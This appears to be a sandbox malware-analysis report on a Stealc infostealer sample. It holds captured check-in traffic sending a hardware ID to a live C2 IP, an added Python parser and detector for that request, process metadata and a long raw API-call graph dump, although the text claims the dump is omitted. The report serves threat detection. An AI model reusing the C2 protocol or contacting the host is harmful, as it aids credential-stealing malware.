                        • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 185.215.113.37 | 80 | 7744 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 06:03:10.434475899 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
Oct 14, 2024 06:03:11.154912949 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 04:03:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
Oct 14, 2024 06:03:11.158662081 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 30 34 32 33 36 43 44 34 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a
                        Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="hwid"4D04236CD4534228319403------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build"doma------GHJKECAAAFHJECAAAEBF--
Oct 14, 2024 06:03:11.394665003 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Mon, 14 Oct 2024 04:03:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=
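The two requests above are the sample's check-in: an empty GET to the C2 root, then a multipart POST carrying a hardware identifier (hwid) and a build tag (build) to a .php endpoint, answered with eight base64 bytes. The following Python is an added example and is not part of the Joe Sandbox report: it rebuilds the 211-byte POST body from the captured hex (constructed inline from the Data Raw above), parses the form fields, decodes the reply, and applies a shape check that can be run over proxy or IDS logs. The path pattern (16 lowercase hex characters followed by .php) and the exact field set are taken from this single capture; treating them as a general signature is an assumption, not a validated rule.

```python
import base64
import re

# Constructed from the capture above: the 211-byte multipart body of the
# POST to /e2b1563c6670f193.php and the 8-byte reply body.
BOUNDARY = "----GHJKECAAAFHJECAAAEBF"
CHECKIN_BODY = (
    b"------GHJKECAAAFHJECAAAEBF\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"4D04236CD4534228319403\r\n"
    b"------GHJKECAAAFHJECAAAEBF\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------GHJKECAAAFHJECAAAEBF--\r\n"
)
CHECKIN_REPLY = b"YmxvY2s="

# Shape of the request path in this one capture (16 lowercase hex chars + .php).
# Treating it as a general pattern is an assumption, not a validated signature.
CHECKIN_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body on "--" + boundary and return
    {field name: value}. Handles only the simple form-data parts seen here."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # leading empty piece / closing marker
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', headers)
        if name:
            fields[name.group(1).decode()] = value.decode(errors="replace")
    return fields


def decode_reply(reply: bytes) -> str:
    """The C2 answers with base64; decode it to the plain string."""
    return base64.b64decode(reply).decode()


def checkin_shape_matches(method: str, path: str, content_type: str, body: bytes) -> bool:
    """True when a request looks like the check-in above: POST, multipart
    form-data, path /<16 hex>.php, and exactly the fields hwid and build."""
    if method != "POST" or not CHECKIN_PATH.match(path):
        return False
    if not content_type.startswith("multipart/form-data"):
        return False
    boundary = re.search(r"boundary=([^;\s]+)", content_type)
    if not boundary:
        return False
    return set(parse_multipart(body, boundary.group(1))) == {"hwid", "build"}


if __name__ == "__main__":
    fields = parse_multipart(CHECKIN_BODY, BOUNDARY)
    print("fields:", fields, "length:", len(CHECKIN_BODY))
    print("reply:", decode_reply(CHECKIN_REPLY))
    print("shape matches:", checkin_shape_matches(
        "POST", "/e2b1563c6670f193.php",
        "multipart/form-data; boundary=" + BOUNDARY, CHECKIN_BODY))
```

The reconstructed body is exactly 211 bytes, matching the Content-Length header, and the reply decodes to the five-character string block. Within this capture no further requests follow that reply and the process has exited, so the traffic shown here should not be read as the sample's full network profile: the C2 declined this host before any later stages could be observed.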

                        Target ID:0
                        Start time:00:03:06
                        Start date:14/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0xae0000
                        File size:1'869'312 bytes
                        MD5 hash:B77C7D40FF8020C4240697847B4F5684
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:3.2%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:25
                          execution_graph: [node and edge listing of the rendered graph omitted; it is not meaningful as text]
                          API calls named on the graph's nodes, in order of first appearance: GetSystemTime, OpenEventA, CreateEventA, CloseHandle, Sleep, GetPEB, LoadLibraryA, GetProcAddress, lstrcpy, ExitProcess, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, GlobalMemoryStatusEx, GetUserDefaultLangID, GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA, lstrlen, lstrcat, sscanf, SystemTimeToFileTime, GetWindowsDirectoryA, InternetOpenA, VirtualProtect, VirtualFree, StrCmpCA.
                          In the graph, the nodes calling GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx and GetUserDefaultLangID each have a direct edge to an ExitProcess node (the GetUserDefaultLangID node to five of them), which is the graph-level view of the system-resource and locale checks that terminate the process before the collection and network code is reached.
ae1670 lstrcpy 14655->14656 14656->14660 14657->14625 14658->14625 14659->14625 14660->13713 14662 af754c 14661->14662 14663 af7553 GetVolumeInformationA 14661->14663 14662->14663 14664 af7591 14663->14664 14665 af75fc GetProcessHeap RtlAllocateHeap 14664->14665 14666 af7619 14665->14666 14667 af7628 wsprintfA 14665->14667 14668 afa740 lstrcpy 14666->14668 14669 afa740 lstrcpy 14667->14669 14670 af5da7 14668->14670 14669->14670 14670->13734 14672 afa7a0 lstrcpy 14671->14672 14673 ae4899 14672->14673 15724 ae47b0 14673->15724 14675 ae48a5 14676 afa740 lstrcpy 14675->14676 14677 ae48d7 14676->14677 14678 afa740 lstrcpy 14677->14678 14679 ae48e4 14678->14679 14680 afa740 lstrcpy 14679->14680 14681 ae48f1 14680->14681 14682 afa740 lstrcpy 14681->14682 14683 ae48fe 14682->14683 14684 afa740 lstrcpy 14683->14684 14685 ae490b InternetOpenA StrCmpCA 14684->14685 14686 ae4944 14685->14686 14687 ae4ecb InternetCloseHandle 14686->14687 14688 ae4955 14686->14688 14690 ae4ee8 14687->14690 15735 af8b60 14688->15735 15730 ae9ac0 CryptStringToBinaryA 14690->15730 14691 ae4963 15743 afa920 14691->15743 14694 ae4976 14696 afa8a0 lstrcpy 14694->14696 14700 ae497f 14696->14700 14697 afa820 2 API calls 14698 ae4f05 14697->14698 14699 afa9b0 4 API calls 14698->14699 14701 ae4f1b 14699->14701 14705 afa9b0 4 API calls 14700->14705 14703 afa8a0 lstrcpy 14701->14703 14702 ae4f27 codecvt 14704 afa7a0 lstrcpy 14702->14704 14703->14702 14717 ae4f57 14704->14717 14706 ae49a9 14705->14706 14707 afa8a0 lstrcpy 14706->14707 14708 ae49b2 14707->14708 14709 afa9b0 4 API calls 14708->14709 14710 ae49d1 14709->14710 14711 afa8a0 lstrcpy 14710->14711 14712 ae49da 14711->14712 14713 afa920 3 API calls 14712->14713 14714 ae49f8 14713->14714 14715 afa8a0 lstrcpy 14714->14715 14716 ae4a01 14715->14716 14718 afa9b0 4 API calls 14716->14718 14717->13737 14719 ae4a20 14718->14719 14720 afa8a0 lstrcpy 14719->14720 14721 ae4a29 14720->14721 14722 afa9b0 4 API calls 14721->14722 14723 ae4a48 14722->14723 14724 
afa8a0 lstrcpy 14723->14724 14725 ae4a51 14724->14725 14726 afa9b0 4 API calls 14725->14726 14727 ae4a7d 14726->14727 14728 afa920 3 API calls 14727->14728 14729 ae4a84 14728->14729 14730 afa8a0 lstrcpy 14729->14730 14731 ae4a8d 14730->14731 14732 ae4aa3 InternetConnectA 14731->14732 14732->14687 14733 ae4ad3 HttpOpenRequestA 14732->14733 14735 ae4ebe InternetCloseHandle 14733->14735 14736 ae4b28 14733->14736 14735->14687 14737 afa9b0 4 API calls 14736->14737 14738 ae4b3c 14737->14738 14739 afa8a0 lstrcpy 14738->14739 14740 ae4b45 14739->14740 14741 afa920 3 API calls 14740->14741 14742 ae4b63 14741->14742 14743 afa8a0 lstrcpy 14742->14743 14744 ae4b6c 14743->14744 14745 afa9b0 4 API calls 14744->14745 14746 ae4b8b 14745->14746 14747 afa8a0 lstrcpy 14746->14747 14748 ae4b94 14747->14748 14749 afa9b0 4 API calls 14748->14749 14750 ae4bb5 14749->14750 14751 afa8a0 lstrcpy 14750->14751 14752 ae4bbe 14751->14752 14753 afa9b0 4 API calls 14752->14753 14754 ae4bde 14753->14754 14755 afa8a0 lstrcpy 14754->14755 14756 ae4be7 14755->14756 14757 afa9b0 4 API calls 14756->14757 14758 ae4c06 14757->14758 14759 afa8a0 lstrcpy 14758->14759 14760 ae4c0f 14759->14760 14761 afa920 3 API calls 14760->14761 14762 ae4c2d 14761->14762 14763 afa8a0 lstrcpy 14762->14763 14764 ae4c36 14763->14764 14765 afa9b0 4 API calls 14764->14765 14766 ae4c55 14765->14766 14767 afa8a0 lstrcpy 14766->14767 14768 ae4c5e 14767->14768 14769 afa9b0 4 API calls 14768->14769 14770 ae4c7d 14769->14770 14771 afa8a0 lstrcpy 14770->14771 14772 ae4c86 14771->14772 14773 afa920 3 API calls 14772->14773 14774 ae4ca4 14773->14774 14775 afa8a0 lstrcpy 14774->14775 14776 ae4cad 14775->14776 14777 afa9b0 4 API calls 14776->14777 14778 ae4ccc 14777->14778 14779 afa8a0 lstrcpy 14778->14779 14780 ae4cd5 14779->14780 14781 afa9b0 4 API calls 14780->14781 14782 ae4cf6 14781->14782 14783 afa8a0 lstrcpy 14782->14783 14784 ae4cff 14783->14784 14785 afa9b0 4 API calls 14784->14785 14786 ae4d1f 14785->14786 14787 afa8a0 lstrcpy 
14786->14787 14788 ae4d28 14787->14788 14789 afa9b0 4 API calls 14788->14789 14790 ae4d47 14789->14790 14791 afa8a0 lstrcpy 14790->14791 14792 ae4d50 14791->14792 14793 afa920 3 API calls 14792->14793 14794 ae4d6e 14793->14794 14795 afa8a0 lstrcpy 14794->14795 14796 ae4d77 14795->14796 14797 afa740 lstrcpy 14796->14797 14798 ae4d92 14797->14798 14799 afa920 3 API calls 14798->14799 14800 ae4db3 14799->14800 14801 afa920 3 API calls 14800->14801 14802 ae4dba 14801->14802 14803 afa8a0 lstrcpy 14802->14803 14804 ae4dc6 14803->14804 14805 ae4de7 lstrlen 14804->14805 14806 ae4dfa 14805->14806 14807 ae4e03 lstrlen 14806->14807 15749 afaad0 14807->15749 14809 ae4e13 HttpSendRequestA 14810 ae4e32 InternetReadFile 14809->14810 14811 ae4e67 InternetCloseHandle 14810->14811 14816 ae4e5e 14810->14816 14814 afa800 14811->14814 14813 afa9b0 4 API calls 14813->14816 14814->14735 14815 afa8a0 lstrcpy 14815->14816 14816->14810 14816->14811 14816->14813 14816->14815 15751 afaad0 14817->15751 14819 af17c4 StrCmpCA 14820 af17cf ExitProcess 14819->14820 14824 af17d7 14819->14824 14821 af19c2 14821->13739 14822 af18cf StrCmpCA 14822->14824 14823 af18ad StrCmpCA 14823->14824 14824->14821 14824->14822 14824->14823 14825 af187f StrCmpCA 14824->14825 14826 af185d StrCmpCA 14824->14826 14827 af1913 StrCmpCA 14824->14827 14828 af1932 StrCmpCA 14824->14828 14829 af18f1 StrCmpCA 14824->14829 14830 af1951 StrCmpCA 14824->14830 14831 af1970 StrCmpCA 14824->14831 14832 afa820 lstrlen lstrcpy 14824->14832 14825->14824 14826->14824 14827->14824 14828->14824 14829->14824 14830->14824 14831->14824 14832->14824 14834 afa7a0 lstrcpy 14833->14834 14835 ae5979 14834->14835 14836 ae47b0 2 API calls 14835->14836 14837 ae5985 14836->14837 14838 afa740 lstrcpy 14837->14838 14839 ae59ba 14838->14839 14840 afa740 lstrcpy 14839->14840 14841 ae59c7 14840->14841 14842 afa740 lstrcpy 14841->14842 14843 ae59d4 14842->14843 14844 afa740 lstrcpy 14843->14844 14845 ae59e1 14844->14845 14846 afa740 lstrcpy 14845->14846 
14847 ae59ee InternetOpenA StrCmpCA 14846->14847 14848 ae5a1d 14847->14848 14849 ae5fc3 InternetCloseHandle 14848->14849 14850 af8b60 3 API calls 14848->14850 14851 ae5fe0 14849->14851 14852 ae5a3c 14850->14852 14854 ae9ac0 4 API calls 14851->14854 14853 afa920 3 API calls 14852->14853 14855 ae5a4f 14853->14855 14856 ae5fe6 14854->14856 14857 afa8a0 lstrcpy 14855->14857 14858 afa820 2 API calls 14856->14858 14861 ae601f codecvt 14856->14861 14862 ae5a58 14857->14862 14859 ae5ffd 14858->14859 14860 afa9b0 4 API calls 14859->14860 14863 ae6013 14860->14863 14865 afa7a0 lstrcpy 14861->14865 14866 afa9b0 4 API calls 14862->14866 14864 afa8a0 lstrcpy 14863->14864 14864->14861 14874 ae604f 14865->14874 14867 ae5a82 14866->14867 14868 afa8a0 lstrcpy 14867->14868 14869 ae5a8b 14868->14869 14870 afa9b0 4 API calls 14869->14870 14871 ae5aaa 14870->14871 14872 afa8a0 lstrcpy 14871->14872 14873 ae5ab3 14872->14873 14875 afa920 3 API calls 14873->14875 14874->13745 14876 ae5ad1 14875->14876 14877 afa8a0 lstrcpy 14876->14877 14878 ae5ada 14877->14878 14879 afa9b0 4 API calls 14878->14879 14880 ae5af9 14879->14880 14881 afa8a0 lstrcpy 14880->14881 14882 ae5b02 14881->14882 14883 afa9b0 4 API calls 14882->14883 14884 ae5b21 14883->14884 14885 afa8a0 lstrcpy 14884->14885 14886 ae5b2a 14885->14886 14887 afa9b0 4 API calls 14886->14887 14888 ae5b56 14887->14888 14889 afa920 3 API calls 14888->14889 14890 ae5b5d 14889->14890 14891 afa8a0 lstrcpy 14890->14891 14892 ae5b66 14891->14892 14893 ae5b7c InternetConnectA 14892->14893 14893->14849 14894 ae5bac HttpOpenRequestA 14893->14894 14896 ae5c0b 14894->14896 14897 ae5fb6 InternetCloseHandle 14894->14897 14898 afa9b0 4 API calls 14896->14898 14897->14849 14899 ae5c1f 14898->14899 14900 afa8a0 lstrcpy 14899->14900 14901 ae5c28 14900->14901 14902 afa920 3 API calls 14901->14902 14903 ae5c46 14902->14903 14904 afa8a0 lstrcpy 14903->14904 14905 ae5c4f 14904->14905 14906 afa9b0 4 API calls 14905->14906 14907 ae5c6e 14906->14907 14908 afa8a0 
lstrcpy 14907->14908 14909 ae5c77 14908->14909 14910 afa9b0 4 API calls 14909->14910 14911 ae5c98 14910->14911 14912 afa8a0 lstrcpy 14911->14912 14913 ae5ca1 14912->14913 14914 afa9b0 4 API calls 14913->14914 14915 ae5cc1 14914->14915 14916 afa8a0 lstrcpy 14915->14916 14917 ae5cca 14916->14917 14918 afa9b0 4 API calls 14917->14918 14919 ae5ce9 14918->14919 14920 afa8a0 lstrcpy 14919->14920 14921 ae5cf2 14920->14921 14922 afa920 3 API calls 14921->14922 14923 ae5d10 14922->14923 14924 afa8a0 lstrcpy 14923->14924 14925 ae5d19 14924->14925 14926 afa9b0 4 API calls 14925->14926 14927 ae5d38 14926->14927 14928 afa8a0 lstrcpy 14927->14928 14929 ae5d41 14928->14929 14930 afa9b0 4 API calls 14929->14930 14931 ae5d60 14930->14931 14932 afa8a0 lstrcpy 14931->14932 14933 ae5d69 14932->14933 14934 afa920 3 API calls 14933->14934 14935 ae5d87 14934->14935 14936 afa8a0 lstrcpy 14935->14936 14937 ae5d90 14936->14937 14938 afa9b0 4 API calls 14937->14938 14939 ae5daf 14938->14939 14940 afa8a0 lstrcpy 14939->14940 14941 ae5db8 14940->14941 14942 afa9b0 4 API calls 14941->14942 14943 ae5dd9 14942->14943 14944 afa8a0 lstrcpy 14943->14944 14945 ae5de2 14944->14945 14946 afa9b0 4 API calls 14945->14946 14947 ae5e02 14946->14947 14948 afa8a0 lstrcpy 14947->14948 14949 ae5e0b 14948->14949 14950 afa9b0 4 API calls 14949->14950 14951 ae5e2a 14950->14951 14952 afa8a0 lstrcpy 14951->14952 14953 ae5e33 14952->14953 14954 afa920 3 API calls 14953->14954 14955 ae5e54 14954->14955 14956 afa8a0 lstrcpy 14955->14956 14957 ae5e5d 14956->14957 14958 ae5e70 lstrlen 14957->14958 15752 afaad0 14958->15752 14960 ae5e81 lstrlen GetProcessHeap RtlAllocateHeap 15753 afaad0 14960->15753 14962 ae5eae lstrlen 14963 ae5ebe 14962->14963 14964 ae5ed7 lstrlen 14963->14964 14965 ae5ee7 14964->14965 14966 ae5ef0 lstrlen 14965->14966 14967 ae5f04 14966->14967 14968 ae5f1a lstrlen 14967->14968 15754 afaad0 14968->15754 14970 ae5f2a HttpSendRequestA 14971 ae5f35 InternetReadFile 14970->14971 14972 ae5f6a 
InternetCloseHandle 14971->14972 14976 ae5f61 14971->14976 14972->14897 14974 afa9b0 4 API calls 14974->14976 14975 afa8a0 lstrcpy 14975->14976 14976->14971 14976->14972 14976->14974 14976->14975 14979 af1077 14977->14979 14978 af1151 14978->13747 14979->14978 14980 afa820 lstrlen lstrcpy 14979->14980 14980->14979 14986 af0db7 14981->14986 14982 af0f17 14982->13755 14983 af0e27 StrCmpCA 14983->14986 14984 af0e67 StrCmpCA 14984->14986 14985 af0ea4 StrCmpCA 14985->14986 14986->14982 14986->14983 14986->14984 14986->14985 14987 afa820 lstrlen lstrcpy 14986->14987 14987->14986 14991 af0f67 14988->14991 14989 af1044 14989->13763 14990 af0fb2 StrCmpCA 14990->14991 14991->14989 14991->14990 14992 afa820 lstrlen lstrcpy 14991->14992 14992->14991 14994 afa740 lstrcpy 14993->14994 14995 af1a26 14994->14995 14996 afa9b0 4 API calls 14995->14996 14997 af1a37 14996->14997 14998 afa8a0 lstrcpy 14997->14998 14999 af1a40 14998->14999 15000 afa9b0 4 API calls 14999->15000 15001 af1a5b 15000->15001 15002 afa8a0 lstrcpy 15001->15002 15003 af1a64 15002->15003 15004 afa9b0 4 API calls 15003->15004 15005 af1a7d 15004->15005 15006 afa8a0 lstrcpy 15005->15006 15007 af1a86 15006->15007 15008 afa9b0 4 API calls 15007->15008 15009 af1aa1 15008->15009 15010 afa8a0 lstrcpy 15009->15010 15011 af1aaa 15010->15011 15012 afa9b0 4 API calls 15011->15012 15013 af1ac3 15012->15013 15014 afa8a0 lstrcpy 15013->15014 15015 af1acc 15014->15015 15016 afa9b0 4 API calls 15015->15016 15017 af1ae7 15016->15017 15018 afa8a0 lstrcpy 15017->15018 15019 af1af0 15018->15019 15020 afa9b0 4 API calls 15019->15020 15021 af1b09 15020->15021 15022 afa8a0 lstrcpy 15021->15022 15023 af1b12 15022->15023 15024 afa9b0 4 API calls 15023->15024 15025 af1b2d 15024->15025 15026 afa8a0 lstrcpy 15025->15026 15027 af1b36 15026->15027 15028 afa9b0 4 API calls 15027->15028 15029 af1b4f 15028->15029 15030 afa8a0 lstrcpy 15029->15030 15031 af1b58 15030->15031 15032 afa9b0 4 API calls 15031->15032 15033 af1b76 15032->15033 15034 
afa8a0 lstrcpy 15033->15034 15035 af1b7f 15034->15035 15036 af7500 6 API calls 15035->15036 15037 af1b96 15036->15037 15038 afa920 3 API calls 15037->15038 15039 af1ba9 15038->15039 15040 afa8a0 lstrcpy 15039->15040 15041 af1bb2 15040->15041 15042 afa9b0 4 API calls 15041->15042 15043 af1bdc 15042->15043 15044 afa8a0 lstrcpy 15043->15044 15045 af1be5 15044->15045 15046 afa9b0 4 API calls 15045->15046 15047 af1c05 15046->15047 15048 afa8a0 lstrcpy 15047->15048 15049 af1c0e 15048->15049 15755 af7690 GetProcessHeap RtlAllocateHeap 15049->15755 15052 afa9b0 4 API calls 15053 af1c2e 15052->15053 15054 afa8a0 lstrcpy 15053->15054 15055 af1c37 15054->15055 15056 afa9b0 4 API calls 15055->15056 15057 af1c56 15056->15057 15058 afa8a0 lstrcpy 15057->15058 15059 af1c5f 15058->15059 15060 afa9b0 4 API calls 15059->15060 15061 af1c80 15060->15061 15062 afa8a0 lstrcpy 15061->15062 15063 af1c89 15062->15063 15762 af77c0 GetCurrentProcess IsWow64Process 15063->15762 15066 afa9b0 4 API calls 15067 af1ca9 15066->15067 15068 afa8a0 lstrcpy 15067->15068 15069 af1cb2 15068->15069 15070 afa9b0 4 API calls 15069->15070 15071 af1cd1 15070->15071 15072 afa8a0 lstrcpy 15071->15072 15073 af1cda 15072->15073 15074 afa9b0 4 API calls 15073->15074 15075 af1cfb 15074->15075 15076 afa8a0 lstrcpy 15075->15076 15077 af1d04 15076->15077 15078 af7850 3 API calls 15077->15078 15079 af1d14 15078->15079 15080 afa9b0 4 API calls 15079->15080 15081 af1d24 15080->15081 15082 afa8a0 lstrcpy 15081->15082 15083 af1d2d 15082->15083 15084 afa9b0 4 API calls 15083->15084 15085 af1d4c 15084->15085 15086 afa8a0 lstrcpy 15085->15086 15087 af1d55 15086->15087 15088 afa9b0 4 API calls 15087->15088 15089 af1d75 15088->15089 15090 afa8a0 lstrcpy 15089->15090 15091 af1d7e 15090->15091 15092 af78e0 3 API calls 15091->15092 15093 af1d8e 15092->15093 15094 afa9b0 4 API calls 15093->15094 15095 af1d9e 15094->15095 15096 afa8a0 lstrcpy 15095->15096 15097 af1da7 15096->15097 15098 afa9b0 4 API calls 15097->15098 15099 af1dc6 
15098->15099 15100 afa8a0 lstrcpy 15099->15100 15101 af1dcf 15100->15101 15102 afa9b0 4 API calls 15101->15102 15103 af1df0 15102->15103 15104 afa8a0 lstrcpy 15103->15104 15105 af1df9 15104->15105 15764 af7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15105->15764 15108 afa9b0 4 API calls 15109 af1e19 15108->15109 15110 afa8a0 lstrcpy 15109->15110 15111 af1e22 15110->15111 15112 afa9b0 4 API calls 15111->15112 15113 af1e41 15112->15113 15114 afa8a0 lstrcpy 15113->15114 15115 af1e4a 15114->15115 15116 afa9b0 4 API calls 15115->15116 15117 af1e6b 15116->15117 15118 afa8a0 lstrcpy 15117->15118 15119 af1e74 15118->15119 15766 af7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15119->15766 15122 afa9b0 4 API calls 15123 af1e94 15122->15123 15124 afa8a0 lstrcpy 15123->15124 15125 af1e9d 15124->15125 15126 afa9b0 4 API calls 15125->15126 15127 af1ebc 15126->15127 15128 afa8a0 lstrcpy 15127->15128 15129 af1ec5 15128->15129 15130 afa9b0 4 API calls 15129->15130 15131 af1ee5 15130->15131 15132 afa8a0 lstrcpy 15131->15132 15133 af1eee 15132->15133 15769 af7b00 GetUserDefaultLocaleName 15133->15769 15136 afa9b0 4 API calls 15137 af1f0e 15136->15137 15138 afa8a0 lstrcpy 15137->15138 15139 af1f17 15138->15139 15140 afa9b0 4 API calls 15139->15140 15141 af1f36 15140->15141 15142 afa8a0 lstrcpy 15141->15142 15143 af1f3f 15142->15143 15144 afa9b0 4 API calls 15143->15144 15145 af1f60 15144->15145 15146 afa8a0 lstrcpy 15145->15146 15147 af1f69 15146->15147 15773 af7b90 15147->15773 15149 af1f80 15150 afa920 3 API calls 15149->15150 15151 af1f93 15150->15151 15152 afa8a0 lstrcpy 15151->15152 15153 af1f9c 15152->15153 15154 afa9b0 4 API calls 15153->15154 15155 af1fc6 15154->15155 15156 afa8a0 lstrcpy 15155->15156 15157 af1fcf 15156->15157 15158 afa9b0 4 API calls 15157->15158 15159 af1fef 15158->15159 15160 afa8a0 lstrcpy 15159->15160 15161 af1ff8 15160->15161 15785 af7d80 GetSystemPowerStatus 15161->15785 15164 afa9b0 4 API calls 15165 af2018 15164->15165 15166 
afa8a0 lstrcpy 15165->15166 15167 af2021 15166->15167 15168 afa9b0 4 API calls 15167->15168 15169 af2040 15168->15169 15170 afa8a0 lstrcpy 15169->15170 15171 af2049 15170->15171 15172 afa9b0 4 API calls 15171->15172 15173 af206a 15172->15173 15174 afa8a0 lstrcpy 15173->15174 15175 af2073 15174->15175 15176 af207e GetCurrentProcessId 15175->15176 15787 af9470 OpenProcess 15176->15787 15179 afa920 3 API calls 15180 af20a4 15179->15180 15181 afa8a0 lstrcpy 15180->15181 15182 af20ad 15181->15182 15183 afa9b0 4 API calls 15182->15183 15184 af20d7 15183->15184 15185 afa8a0 lstrcpy 15184->15185 15186 af20e0 15185->15186 15187 afa9b0 4 API calls 15186->15187 15188 af2100 15187->15188 15189 afa8a0 lstrcpy 15188->15189 15190 af2109 15189->15190 15792 af7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15190->15792 15193 afa9b0 4 API calls 15194 af2129 15193->15194 15195 afa8a0 lstrcpy 15194->15195 15196 af2132 15195->15196 15197 afa9b0 4 API calls 15196->15197 15198 af2151 15197->15198 15199 afa8a0 lstrcpy 15198->15199 15200 af215a 15199->15200 15201 afa9b0 4 API calls 15200->15201 15202 af217b 15201->15202 15203 afa8a0 lstrcpy 15202->15203 15204 af2184 15203->15204 15796 af7f60 15204->15796 15207 afa9b0 4 API calls 15208 af21a4 15207->15208 15209 afa8a0 lstrcpy 15208->15209 15210 af21ad 15209->15210 15211 afa9b0 4 API calls 15210->15211 15212 af21cc 15211->15212 15213 afa8a0 lstrcpy 15212->15213 15214 af21d5 15213->15214 15215 afa9b0 4 API calls 15214->15215 15216 af21f6 15215->15216 15217 afa8a0 lstrcpy 15216->15217 15218 af21ff 15217->15218 15809 af7ed0 GetSystemInfo wsprintfA 15218->15809 15221 afa9b0 4 API calls 15222 af221f 15221->15222 15223 afa8a0 lstrcpy 15222->15223 15224 af2228 15223->15224 15225 afa9b0 4 API calls 15224->15225 15226 af2247 15225->15226 15227 afa8a0 lstrcpy 15226->15227 15228 af2250 15227->15228 15229 afa9b0 4 API calls 15228->15229 15230 af2270 15229->15230 15231 afa8a0 lstrcpy 15230->15231 15232 af2279 15231->15232 15811 af8100 GetProcessHeap 
RtlAllocateHeap 15232->15811 15235 afa9b0 4 API calls 15236 af2299 15235->15236 15237 afa8a0 lstrcpy 15236->15237 15238 af22a2 15237->15238 15239 afa9b0 4 API calls 15238->15239 15240 af22c1 15239->15240 15241 afa8a0 lstrcpy 15240->15241 15242 af22ca 15241->15242 15243 afa9b0 4 API calls 15242->15243 15244 af22eb 15243->15244 15245 afa8a0 lstrcpy 15244->15245 15246 af22f4 15245->15246 15817 af87c0 15246->15817 15249 afa920 3 API calls 15250 af231e 15249->15250 15251 afa8a0 lstrcpy 15250->15251 15252 af2327 15251->15252 15253 afa9b0 4 API calls 15252->15253 15254 af2351 15253->15254 15255 afa8a0 lstrcpy 15254->15255 15256 af235a 15255->15256 15257 afa9b0 4 API calls 15256->15257 15258 af237a 15257->15258 15259 afa8a0 lstrcpy 15258->15259 15260 af2383 15259->15260 15261 afa9b0 4 API calls 15260->15261 15262 af23a2 15261->15262 15263 afa8a0 lstrcpy 15262->15263 15264 af23ab 15263->15264 15822 af81f0 15264->15822 15266 af23c2 15267 afa920 3 API calls 15266->15267 15268 af23d5 15267->15268 15269 afa8a0 lstrcpy 15268->15269 15270 af23de 15269->15270 15271 afa9b0 4 API calls 15270->15271 15272 af240a 15271->15272 15273 afa8a0 lstrcpy 15272->15273 15274 af2413 15273->15274 15275 afa9b0 4 API calls 15274->15275 15276 af2432 15275->15276 15277 afa8a0 lstrcpy 15276->15277 15278 af243b 15277->15278 15279 afa9b0 4 API calls 15278->15279 15280 af245c 15279->15280 15281 afa8a0 lstrcpy 15280->15281 15282 af2465 15281->15282 15283 afa9b0 4 API calls 